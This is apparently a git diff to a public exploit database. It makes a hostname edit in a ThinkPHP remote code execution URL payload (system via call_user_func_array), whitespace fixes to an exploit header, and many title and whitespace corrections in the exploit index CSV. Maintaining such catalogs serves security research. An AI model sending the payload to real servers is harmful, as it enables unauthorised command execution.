diff --git a/exploits/php/webapps/45978.txt b/exploits/php/webapps/45978.txt index 00b6552e3..55dc0bcbb 100644 --- a/exploits/php/webapps/45978.txt +++ b/exploits/php/webapps/45978.txt @@ -8,4 +8,4 @@ # Exploit -http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' \ No newline at end of file +http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' \ No newline at end of file diff --git a/exploits/windows/local/951.py b/exploits/windows/local/951.py index 6ebf55f2c..8b5b6693d 100755 --- a/exploits/windows/local/951.py +++ b/exploits/windows/local/951.py @@ -7,8 +7,8 @@ # # # Based on the exploit written by S.Pearson and # # Python version by coded by Tal zeltzer # -# # -# XP/sp2 fixed version by Jean Luc # +# # +# XP/sp2 fixed version by Jean Luc # # # ################################################################## diff --git a/files_exploits.csv b/files_exploits.csv index 3f87f9d9d..0131c8504 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -3048,7 +3048,7 @@ id,file,description,date,author,type,platform,port
 23442,exploits/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,dos,osx,
 23444,exploits/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,dos,multiple,
 23460,exploits/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",dos,php,
-23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow",2003-12-23,storm,dos,windows,
+23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow",2003-12-23,storm,dos,windows,
 23469,exploits/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,dos,windows,
 23480,exploits/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC)",2003-12-26,"decka trash",dos,windows,
 23496,exploits/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",dos,windows,
@@ -3703,7 +3703,7 @@ id,file,description,date,author,type,platform,port
 29287,exploits/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",dos,windows,
 29295,exploits/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,dos,windows,
 29296,exploits/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",dos,linux,
-29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware,
+29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware,
 29305,exploits/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple,
 29307,exploits/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",dos,windows,
 29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple,
@@ -4062,7 +4062,7 @@ id,file,description,date,author,type,platform,port
 32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple,
 32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple,
 32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple,
-32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service",2008-08-08,Antunes,dos,multiple,
+32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service",2008-08-08,Antunes,dos,multiple,
 32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple,
 32222,exploits/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",dos,multiple,
 32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows,
@@ -4348,7 +4348,7 @@ id,file,description,date,author,type,platform,port
 34375,exploits/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",dos,linux,
 34394,exploits/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC)",2010-08-03,"Rodrigo Escobar",dos,hardware,
 34395,exploits/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",dos,windows,
-34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow",2010-07-22,demonalex,dos,windows,
+34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow",2010-07-22,demonalex,dos,windows,
 34404,exploits/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,dos,windows,
 34427,exploits/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",dos,linux,
 34428,exploits/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",dos,windows,
@@ -5496,7 +5496,7 @@ id,file,description,date,author,type,platform,port
 44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos,
 44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (PoC)",2018-02-14,r4xis,dos,windows,
 44046,exploits/windows/dos/44046.md,"K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read",2017-10-23,SecuriTeam,dos,windows,
-44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux,
+44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free (2)",2017-10-17,SecuriTeam,dos,linux,
 44057,exploits/php/dos/44057.md,"Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service",2017-08-30,SecuriTeam,dos,php,
 44075,exploits/windows/dos/44075.txt,"Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)",2018-02-15,"Google Security Research",dos,windows,
 44076,exploits/windows/dos/44076.js,"Microsoft Edge Chakra JIT - Memory Corruption",2018-02-15,"Google Security Research",dos,windows,
@@ -5808,7 +5808,7 @@ id,file,description,date,author,type,platform,port
 42999,exploits/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",dos,windows,
 43000,exploits/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",dos,windows,
 43001,exploits/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",dos,windows,
-43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux,
+43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free (1)",2017-10-17,SecuriTeam,dos,linux,
 43107,exploits/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",dos,ios,
 43014,exploits/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",dos,linux,
 43020,exploits/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",dos,multiple,
@@ -5999,7 +5999,7 @@ id,file,description,date,author,type,platform,port
 44859,exploits/multiple/dos/44859.html,"WebKit - WebAssembly Compilation Info Leak",2018-06-08,"Google Security Research",dos,multiple,
 44860,exploits/multiple/dos/44860.js,"Google Chrome - Integer Overflow when Processing WebAssembly Locals",2018-06-08,"Google Security Research",dos,multiple,
 44861,exploits/multiple/dos/44861.html,"WebKit - Use-After-Free when Resuming Generator",2018-06-08,"Google Security Research",dos,multiple,
-44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
+44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
 44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple,
 44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux,
 44908,exploits/linux/dos/44908.txt,"Redis 5.0 - Denial of Service",2018-06-20,"Fakhri Zulkifli",dos,linux,
@@ -6114,7 +6114,7 @@ id,file,description,date,author,type,platform,port
 45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
 45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86,
 45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64,
-45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64,
+45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64,
 45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,21
 45431,exploits/windows/dos/45431.js,"Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion",2018-09-18,"Google Security Research",dos,windows,
 45432,exploits/windows/dos/45432.js,"Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion",2018-09-18,"Google Security Research",dos,windows,
@@ -9062,7 +9062,7 @@ id,file,description,date,author,type,platform,port
 32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php,
 32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,local,linux,
 32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows,
-32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64,
+32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64,
 32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,local,windows,
 32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",local,windows,
 32778,exploits/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,local,windows,
@@ -9268,7 +9268,7 @@ id,file,description,date,author,type,platform,port
 37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",local,windows,
 37167,exploits/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions",2015-06-01,"Hacker Fantastic",local,linux,
 37168,exploits/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux,
-37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel",2015-06-02,"Hacker Fantastic",local,linux,
+37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation",2015-06-02,"Hacker Fantastic",local,linux,
 37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,local,windows,
 37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,local,windows,
 37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",local,linux,
@@ -9852,7 +9852,7 @@ id,file,description,date,author,type,platform,port
 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows,
 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows,
 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows,
-43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86,
+43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86,
 43201,exploits/macos/local/43201.rb,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos,
 43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,
@@ -10008,7 +10008,7 @@ id,file,description,date,author,type,platform,port
 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
 44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
 45009,exploits/linux/local/45009.txt,"Awk to Perl 1.007-5 - Buffer Overflow (PoC)",2018-07-11,"Todor Donev",local,linux,
-45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
+45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
 45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
 45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
 45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
@@ -10035,7 +10035,7 @@ id,file,description,date,author,type,platform,port
 45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
 45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
 45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,
-45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
+45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
 45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64,
 45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86,
 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
@@ -10336,7 +10336,7 @@ id,file,description,date,author,type,platform,port
 475,exploits/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator (MS04-028)",2004-09-23,"Elia Florio",remote,windows,
 478,exploits/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode (MS04-028)",2004-09-25,ATmaCA,remote,windows,
 480,exploits/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",remote,windows,
-556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,remote,windows,
+556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ Bind/Reverse/Admin/File Download",2004-09-27,M4Z3R,remote,windows,
 566,exploits/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,remote,windows,80
 568,exploits/windows/remote/568.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (1)",2004-10-06,Delikon,remote,windows,8000
 572,exploits/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer",2004-10-11,"Paul Szabo",remote,windows,
@@ -11814,7 +11814,7 @@ id,file,description,date,author,type,platform,port
 15963,exploits/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",remote,windows,
 15984,exploits/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (MS11-002)",2011-01-12,"Peter Vreugdenhil",remote,windows,
 16014,exploits/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,remote,windows,
-16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows,
+16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows,
 16041,exploits/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,remote,multiple,
 16052,exploits/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",remote,windows,
 16053,exploits/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",remote,windows,
@@ -12213,7 +12213,7 @@ id,file,description,date,author,type,platform,port
 16731,exploits/windows_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows_x86,
 16732,exploits/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,remote,windows,
 16733,exploits/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21
-16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows,
+16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows,
 16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,
 16736,exploits/windows/remote/16736.rb,"FTPShell 5.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
 16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
@@ -12483,7 +12483,7 @@ id,file,description,date,author,type,platform,port
 17575,exploits/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,remote,windows,
 17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows,
 17581,exploits/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,remote,windows,
-17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows,
+17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows,
 17612,exploits/windows/remote/17612.rb,"Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,remote,windows,
 17614,exploits/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",remote,hp-ux,
 17619,exploits/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",remote,windows,
@@ -14446,7 +14446,7 @@ id,file,description,date,author,type,platform,port
 24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
 24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
 24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
-24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow",2013-03-01,superkojiman,remote,windows,
+24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow",2013-03-01,superkojiman,remote,windows,
 24567,exploits/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",remote,multiple,
 24568,exploits/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows,
 24571,exploits/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows,
@@ -14504,7 +14504,7 @@ id,file,description,date,author,type,platform,port
 24856,exploits/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",remote,linux,
 24857,exploits/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",remote,linux,
 24874,exploits/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,remote,multiple,
-24875,exploits/windows/remote/24875.rb,"Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
+24875,exploits/windows/remote/24875.rb,"Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
 24876,exploits/windows/remote/24876.rb,"Cool PDF Image Stream - Remote Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
 24886,exploits/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,remote,windows,
 24887,exploits/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,remote,windows,
@@ -16963,8 +16963,8 @@ id,file,description,date,author,type,platform,port
 45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
 45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
 45233,exploits/linux/remote/45233.py,"OpenSSH 2.3 < 7.7 - Username Enumeration",2018-08-21,"Justin Gardner",remote,linux,
-45260,exploits/linux/remote/45260.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)",2018-08-26,"Mazin Ahmed",remote,linux,8080
-45262,exploits/multiple/remote/45262.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)",2018-08-25,hook-s3c,remote,multiple,8080
+45260,exploits/linux/remote/45260.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)",2018-08-26,"Mazin Ahmed",remote,linux,8080
+45262,exploits/multiple/remote/45262.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)",2018-08-25,hook-s3c,remote,multiple,8080
 45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux,
 45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple,
 45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
@@ -20242,7 +20242,7 @@ id,file,description,date,author,type,platform,port
 5895,exploits/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,webapps,php,
 5896,exploits/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",webapps,php,
 5897,exploits/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php,
-5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php,
+5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php,
 5899,exploits/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",webapps,php,
 5900,exploits/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",webapps,php,
 5901,exploits/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php,
@@ -39922,7 +39922,7 @@ id,file,description,date,author,type,platform,port
 44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,80
 44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp,
-44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
+44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
 44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
 44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php,
